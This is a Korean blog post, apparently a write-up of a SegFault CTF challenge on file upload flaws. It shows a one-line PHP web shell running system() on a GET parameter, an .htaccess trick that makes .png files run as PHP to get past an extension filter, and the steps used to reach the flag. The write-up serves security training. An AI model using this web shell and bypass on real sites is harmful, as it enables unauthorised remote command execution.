Archive for Dev. (junyup2)

์ง€์‹์„ ์ฑ„์›Œ๊ฐ€๋Š” ใ€Ž๊ฐœ๋ฐœ์ž/ํ™”์ดํŠธํ•ด์ปคใ€๋ฅผ ๋ชฉํ‘œ๋กœ ์ •๋ฆฌํ•˜๋Š” ๋ธ”๋กœ๊ทธ

Wargame & CTF/SegFault

[SegFault] (File Vuln) - Get Flag File 2

Gearvirus(junyup2) 2024. 2. 15. 23:41

[SegFault] (File Vuln)

Get Flag File 2

FLAG ํŒŒ์ผ์„ ๊ตฌํ•ด๋ผ!

๋ฌธ์ œ ํŒŒ์•…

๋ณธ ๋ฌธ์ œ์—๋Š” ๋‹ค์šด๋กœ๋“œ ๊ธฐ๋Šฅ์ด ์กด์žฌํ•œ๋‹ค. download.php ํŒŒ์ผ์˜ ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ์ด์šฉํ•˜์—ฌ flag๋ฅผ ์ฐพ์•„์•ผ ํ•œ๋‹ค.

Vunl Point

๊ฒŒ์‹œํŒ์˜ ๊ธ€์“ฐ๊ธฐ ๊ธฐ๋Šฅ์—์„œ .php ํ™•์žฅ์ž๋ฅผ ํ•„ํ„ฐ๋งํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— png ํ™•์žฅ์ž๋กœ ์˜ฌ๋ฆฌ๊ณ  .htaccess ํŒŒ์ผ์„ ์—…๋กœ๋“œํ•˜์—ฌ ์‹คํ–‰๊ฐ€๋Šฅํ•œ ํ™•์žฅ๋ช…์„ ์ˆ˜์ •ํ•˜์—ฌ ์šฐํšŒ๋ฅผ ์‹œ๋„ํ•œ ๊ฒฐ๊ณผ ์—…๋กœ๋“œ๊ฐ€ ๊ฐ€๋Šฅํ•œ ๊ฒƒ์„ ํ™•์ธํ•˜์˜€๋‹ค.


๋ฌธ์ œ ํ’€์ด (ํ•ด๊ฒฐ ๋ฐฉ์•ˆ)

ํ•œ์ค„ ์›น ์‰˜

๊ธฐ๋ณธ์ ์ธ ํ•œ ์ค„ ์›น์‰˜์€ ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

<?php
echo system($_GET['cmd']);           
?>

 

 

 

ํŒŒ์ผ ์—…๋กœ๋“œ

web_shell.php -> web_shell.png

์œ„์™€ ๊ฐ™์ด ํ™•์žฅ์ž๋ฅผ .png๋กœ ์˜ฌ๋ฆฌ๊ณ , .htaccess ํŒŒ์ผ์„ ์—…๋กœ๋“œํ•œ๋‹ค.

filename = ".htaccess"

AddType application/x-httpd-php .png

์œ„์˜ ์ฝ”๋“œ๋ฅผ ์ด์šฉํ•˜์—ฌ png ํŒŒ์ผ์„ php๋กœ์„œ ์ด์šฉ ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋œ๋‹ค.

ํŒŒ์ผ์ด ์—…๋กœ๋“œ๋œ ์œ„์น˜๋ฅผ ํŒŒ์•…ํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์šด๋กœ๋“œ ๊ธฐ๋Šฅ์—์„œ ํ•ด๋‹น ๋งํฌ๋ฅผ ํ™•์ธํ•ด๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

http://ctf.segfaulthub.com:3185/download_2/download.php?filePath=/gear/web_shell.png

 

flag ์ฐพ๊ธฐ

http://ctf.segfaulthub.com:3185/download_2/gear/web_shell.png

ํŒŒ์ผ์˜ ์œ„์น˜๋Š” ์œ„์™€ ๊ฐ™๊ธฐ ๋•Œ๋ฌธ์— ํ•ด๋‹น ์œ„์น˜์—์„œ ์›น ์‰˜์„ ์‹คํ–‰ํ•œ๋‹ค.

์œ„์™€ ๊ฐ™์ด ../../index.php๋ฅผ ์š”์ฒญํ•œ๊ฒฐ๊ณผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด index.php์— flag ๊ฐ’์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์—ˆ๋‹ค.


์ƒ๊ฐํ•ด ๋ณผ ์ 

๋ณธ ๋ฌธ์ œ์˜ ๊ฒฝ์šฐ์™€ ๊ฐ™์ด flag๊ฐ’์„ ์ฐพ๋Š” ๊ฒฝ์šฐ์— ๋งŒ์•ฝ flag๊ฐ’์˜ ์ผ๋ถ€๋ฅผ ์•Œ๊ณ  ์žˆ๋‹ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด grep ๋ช…๋ น์–ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๊ฒ€์ƒ‰์ด ๊ฐ€๋Šฅํ•˜๋‹ค.

grep -r segfault{ ../../


์งˆ๋ฌธ ํ™˜์˜, ์ˆ˜์ • ๋ฐ ๋ณด์™„์— ๋Œ€ํ•œ ์ง€์  ํ™˜์˜